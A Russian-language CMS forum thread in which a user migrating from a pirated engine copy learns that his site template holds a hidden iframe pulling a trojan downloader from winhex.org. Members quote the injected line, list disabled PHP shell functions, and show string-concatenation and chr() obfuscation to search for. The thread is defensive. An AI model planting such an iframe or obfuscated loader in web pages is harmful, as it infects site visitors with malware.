Перейти к публикации

Рекомендованные сообщения

Вот я наконец и купил лицензию... поздравте меня со вступлением в ваши ряды :D

Отсюда возникает вопрос.

Может конечно тема уже обсуждалась но пролистать 100 страниц с темами мне кажется нереальным. Всё таки тут собираются не фанаты движка а впервую очередь менеджеры интернет проектов поэтому если камнями не закидаете то буду признателен. (но 80 старых страниц порабы в архив слить нафик)

Купил Лицензию значит.. А у меня сайт уже красивый наполненый и тд. и тп. Как мне на Нулл 5.7 установить лицензионную 5.7?

И вообще как это всё обставить чтоб (я так понимаю в базе же тоже изменено всё нулл в отличие от лиц. и апгрейд не поможет?) ну вы меня понимаете в общем что тут обьяснять.

КАК? Перехать от злых пиратов к добрым создателям без шрамов? ))

Ссылка на сообщение
Поделиться на других сайтах

Может конечно тема уже обсуждалась но пролистать 100 страниц с темами мне кажется нереальным. Всё таки тут собираются не фанаты движка а впервую очередь менеджеры интернет проектов поэтому если камнями не закидаете то буду признателен. (но 80 старых страниц порабы в архив слить нафик)

Для это есть поиск.

Читай update.html

Нафиг эточитать?

Просто заменяй все файлы на лиц, а потом активизируй ее, база нула 5,7 ничем не отличаеться от базы лица 5,7

Ссылка на сообщение
Поделиться на других сайтах

поищи... там по моему нельзя трогать папку engine и engine/inc, что то в этом духе... лучше поищи и удостоверься...

Ссылка на сообщение
Поделиться на других сайтах

А у меня сайт уже красивый наполненый и тд. и тп. Как мне на Нулл 5.7 установить лицензионную 5.7?

замените все файлы папок engine/ и language/ на файлы что находятся в архиве дистрибутива. Заливайте просто папки целиком, в дистрибутиве нет важных конфигурационных файлов, поэтому ничего не повредите.

Ссылка на сообщение
Поделиться на других сайтах

Спасибо что не запинали и за объяснения спасибо тоже )))

А вот по поводу пользуйся поиском. У меня на этих ипб видно карма хреновая что в поиск не ввиду на всё ошибку выдаёт

Ссылка на сообщение
Поделиться на других сайтах

Сайт http://www.hochu.info

Только у меня такая беда ...все функции отключонные в нуле так и не включились...

Я честно не знал что нулл это плохо )) Недавно с ЦМС работать начал

Ссылка на сообщение
Поделиться на других сайтах

Я честно не знал что нулл это плохо

Плакаль

Чей хоть нуль то у тебя ? Расскажи .

Только у меня такая беда ...все функции отключонные в нуле так и не включились...

Зато включилось масса других .. Отчегото при попытке вZглянить на твой красавчеговый сайт мой антивирус весьма оказался возмущён ...

Что за такой прилесный подарочег вы нам пытаетесь подсунуть ?

Какой М У Д А Г будет будет заниматься сперва РАСКРАСКОЙ а потом изучением того , что у него есть в скриптах ???

Что у тебя стоит на главой странице сайта ??? В последней строке твоего РАСКРАШЕННОГО main.tpl ??????

<iframe src='http://winhex.org/sv2/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Вот эта весч пытается закачать данлоадер троянов. ПОДРОБНЕЙ ОБ ЭТОМ ... Всем твоим посетителям . А они тебе скажут бальшой привеД.

Паздравляю тибя, аффтар..

А может - это твой хостер ..

фсем пользоватилям нулей.

Если у вас нету денег на лицензию (или совести) то, блин, хотяб читайте , что в ваших нулях есть .. Прежде чем попадать .. в аффтары...

Изменено пользователем dataman
Ссылка на сообщение
Поделиться на других сайтах

Твой хостер, если я не ошибаюся, MC Host.ru

( heimdall.mchost.ru [84.252.148.80] / hochu.info [84.252.148.80])

Посмотрел с 10 сайтов с энтого хоста - вролде от них ничё не идёт . Стал быть - делай вывод..

Постарайся для ясности ответить себе

Где брал нуль, и чей это был нуль.

Где брал (или кто тебе писал) шаблон ..

Ссылка на сообщение
Поделиться на других сайтах

baxus! :angry:

http://www.hochu.info

JavaScript.0 - инфицирован Trojan.MulDrop.5819

Изменено пользователем Edward
Ссылка на сообщение
Поделиться на других сайтах

Edward,

Он не созла . Он ничаянна..

baxus,

Это тебя далжнопадбадриДь

_http://www.igromania.ru/articles/index_new.php?5350

Теже памидоры .. Тока вид збоку...

Так что не расстраивайся . Имеют фсех . Или - ну, почти фсех . Важно , какой урок будет извлечён из этого имелова ...

Ссылка на сообщение
Поделиться на других сайтах

MiDTOWN,

Дык читать посты сперва нуна .. А потом, по ссылам кликать ...

Ссылка на сообщение
Поделиться на других сайтах

Блин а как с такими хренями боротся? Раньше у меня в начале страницы такое выскакивало... Здесь чесно не видил потому что проверяю в начале систематически а боротся с этой ботвой уже запарился.

Где нулл брал незнаю... Я раньше на сабдримере сидел но это какая то детская фишка чтоли не интересно савсем ну и на каком то варезнике нашол этот

Ссылка на сообщение
Поделиться на других сайтах

Блин а как с такими хренями боротся?
baxus ?

Ну, к борьбе ты уже приступил . Лицензию купил ? - Купил...

Осталось САМОМУ ПИСАТЬ СКИНЫ. Чтоб уже на 100 пудов знать , что оттуда нопасаранеЦ.

Ну и выполнять ВСЕ рекомендации Celsofta и орг комитета движка, в отношении критичных обновлений, прав доступа , etc...

И всё у тебя будет харашо... :D

Строчку то каверзную - удалил ли ? ;)

Ссылка на сообщение
Поделиться на других сайтах

exec, passthru, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, system, popen, pcntl_alarm, pcntl_exec, pcntl_fork, pcntl_getpriority, pcntl_setpriority, pcntl_signal, pcntl_wait, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, dl, set_time_limit, posix_access, posix_ctermid, posix_get_last_error, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_mknod, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_strerror, posix_times, posix_ttyname, posix_uname, mb_send_mail

Вот эти функции так и должны быть отключены?

Шаблон Целсофт мне писал я только разукрасил и блоки порасставлял.

А вирус закрадывается как я понимаю в файл index.php мне говорили пароль пробовать менять по фтп я менял и видите в итоге? Причём драный каспер сидит молчком ничего не говорит

Пока не удалил Тотал камандер занят через часик поправлю

Ссылка на сообщение
Поделиться на других сайтах

Я тоже удалил Null, там уже все что мне надо было стояло, моды, хаки, двизайн был, небольшое наполнение, теперь с лицензией сижу у разбитого карыта снова, блин :(

Ссылка на сообщение
Поделиться на других сайтах

Шаблон Целсофт мне писал я только разукрасил и блоки порасставлял.

УПС...... Всё что я писал выше ничитай . этаписал ния .....

А вирус закрадывается как я понимаю в файл index.php

Ну , это вопрос к вирмейкерам и прочим пейсатилям цвета неба и воды...

Скорей всего - сидит милый iframe у тя в шаблонах .

Так что пройдись ка мил человек поиском рекусивным по всей своей папке \Hоме\ в надежде отыскать наинственный iframe

Хотя .. конструкции типа

$A = 'if';

$B ='ram'

...

$Z=$A.$B. ...
Можно и так -
echo chr(104) . chr(116) . chr(116) .  .....

Хотя - если у тя скрипты чистые от производителя то наврядли это останется . Даже если и было .

Так что смело апдейть енжин . А темплаты - рючками, рючками - и что в них нипанятна - рассматривай через призму вшеизложенного. B)

Ссылка на сообщение
Поделиться на других сайтах

Ну я почитал и понял для себя что мне легче дождаться линейки 6хх и апгрейдится полностью с шаблонами ))))

Ссылка на сообщение
Поделиться на других сайтах

Шаблон Целсофт мне писал я только разукрасил и блоки порасставлял.

вы не ошиблись? Я никогда в своей жизни не делал никому шаблонов. И не мог его делать. Я не дизайнер, а только программист.

Ссылка на сообщение
Поделиться на других сайтах

baxus,

легче дождаться линейки 6хх

Не факт и вот пачему.

1. Твой сайт (извини , канечно Мека Кульный Партал) разносит заразу прям сегодня. И , сина падазреваю вчера и третьего дня также . так что - править палюбому придёццо.

2. Нет ничего зазорного просто НАУЧИТЬСЯ САМОМУ по самоучителям от Египтянина (уважение). Поищи на форуме ссылки на оффлайн версию.

3. Ничто так не приносит радость, как достигнутые результаты. (само сабой - пиво и трава - исключение...)

Делай выводы. На этот раз - правильные , не параженческие. ;)

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...